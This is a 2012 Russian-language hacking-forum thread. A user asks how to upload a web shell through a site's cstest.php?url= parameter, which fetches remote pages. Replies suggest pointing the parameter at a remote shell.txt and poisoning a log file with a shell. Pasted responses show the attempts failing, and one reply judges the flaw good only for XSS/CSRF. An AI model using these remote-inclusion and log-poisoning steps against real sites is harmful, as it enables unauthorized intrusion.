 |
23.07.2012, 15:41
|
|
Участник форума
Регистрация: 15.06.2011
Сообщений: 155
С нами:
7847606
Репутация:
-1
|
|
Есть сайт: https://site.com/cstest.php?url=
Eсли дописать ссылку https://site.com/cstest.php?url=http://site.ru/shell.php - то на сайте выводиться shell с моим сайтом.
Вопрос: можно ли залить Shell на сайт "https://site.com" ?
|
|
|
23.07.2012, 15:50
|
|
Новичок
Регистрация: 02.10.2009
Сообщений: 2
С нами:
8741355
Репутация:
0
|
|
Попробуй
https://site.com/cstest.php?url=http://site.ru/shell.txt
|
|
|
|
23.07.2012, 15:58
|
|
Участник форума
Регистрация: 15.06.2011
Сообщений: 155
С нами:
7847606
Репутация:
-1
|
|
не прокатило...
вот что выбило:
Сообщение от None
posting to url: http://site.com/shell.txt
Array (
Код:
=> 200 [body] => [header] => HTTP/1.1 200 OK Date: Mon, 23 Jul 2012 10:50:33 GMT Server: LiteSpeed Accept-Ranges: bytes Connection: close ETag: "3870-500d2bf7-0" Last-Modified: Mon, 23 Jul 2012 10:48:23 GMT Content-Type: text/plain Content-Length: 14448 )
[/QUOTE]
[/CODE]
[/QUOTE] |
|
|
|
23.07.2012, 15:58
|
|
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
С нами:
9162683
Репутация:
175
|
|
Сообщение от xxddz
Попробуй
https://site.com/cstest.php?url=http://site.ru/shell.txt
Нет, это не поможет, так как судя по словам из первого поста, на сайте скорее всего создается страница, которая содержит iframe со ссылкой на url.
Сообщение от StormAttack
не прокатило...
вот что выбило:
Хотя не iframe, скорее всего, а сайт просто пытается скачать и вывести страницу, которая передается в параметре url.
|
|
|
|
23.07.2012, 16:01
|
|
Новичок
Регистрация: 16.07.2012
Сообщений: 2
С нами:
7275926
Репутация:
0
|
|
если через cstest.php?url= можно читать локальные файлы, пробуй найти лог-файл и отправить на сервер пакет с шеллом
|
|
|
|
23.07.2012, 16:02
|
|
Участник форума
Регистрация: 15.06.2011
Сообщений: 155
С нами:
7847606
Репутация:
-1
|
|
Сообщение от Chrome~
Нет, это не поможет, так как судя по словам из первого поста, на сайте скорее всего создается страница, которая содержит iframe со ссылкой на url.
это не iframe, это форма с полями URL и FORM Body
|
|
|
|
23.07.2012, 16:06
|
|
Участник форума
Регистрация: 15.06.2011
Сообщений: 155
С нами:
7847606
Репутация:
-1
|
|
Сообщение от человек-паук
если через cstest.php?url= можно читать локальные файлы, пробуй найти лог-файл и отправить на сервер пакет с шеллом
локальные файлы не читает
Сообщение от None
0Array (
Код:
=> 0 [body] => Couldn't resolve host 'whatwedo.php' )
[/QUOTE]
[/CODE]
[/QUOTE]
|
|
|
|
23.07.2012, 16:07
|
|
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
С нами:
9162683
Репутация:
175
|
|
Сообщение от StormAttack
это не iframe, это форма с полями URL и FORM Body
Я понимаю, но страница, которая выводится после отправки формы, может содержать iframe, или же как я написал выше - содержимое скачанного файла.
Сообщение от StormAttack
локальные файлы не читает
Тогда все ясно. Скрипт просто обращается к странице url, скачивает ее, и выводит на экран. Это можно использовать максимум для XSS/CSRF атаки, но только при условии, что страница выведется как html документ, а не чистый текст.
|
|
|
|
23.07.2012, 16:11
|
|
Участник форума
Регистрация: 15.06.2011
Сообщений: 155
С нами:
7847606
Репутация:
-1
|
|
Сообщение от Chrome~
Я понимаю, но страница, которая выводится после отправки формы, может содержать iframe, или же как я написал выше - содержимое скачанного файла.
Тогда все ясно. Скрипт просто обращается к странице url, скачивает ее, и выводит на экран. Это можно использовать максимум для XSS/CSRF атаки, но только при условии, что страница выведется как html документ, а не чистый текст.
Понятно, спасибо.
|
|
|
|
02.08.2012, 10:07
|
|
Познающий
Регистрация: 19.07.2010
Сообщений: 91
С нами:
8324246
Репутация:
19
|
|
Сообщение от None
0Array (
Код:
=> 0 [body] => Couldn't resolve host 'whatwedo.php' )
Код:
А чего он пытается его отрезолвить как хост?
Запрос покажи.
[/QUOTE]
А чего он пытается его отрезолвить как хост?
Запрос покажи.
[/CODE]
[/QUOTE]
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
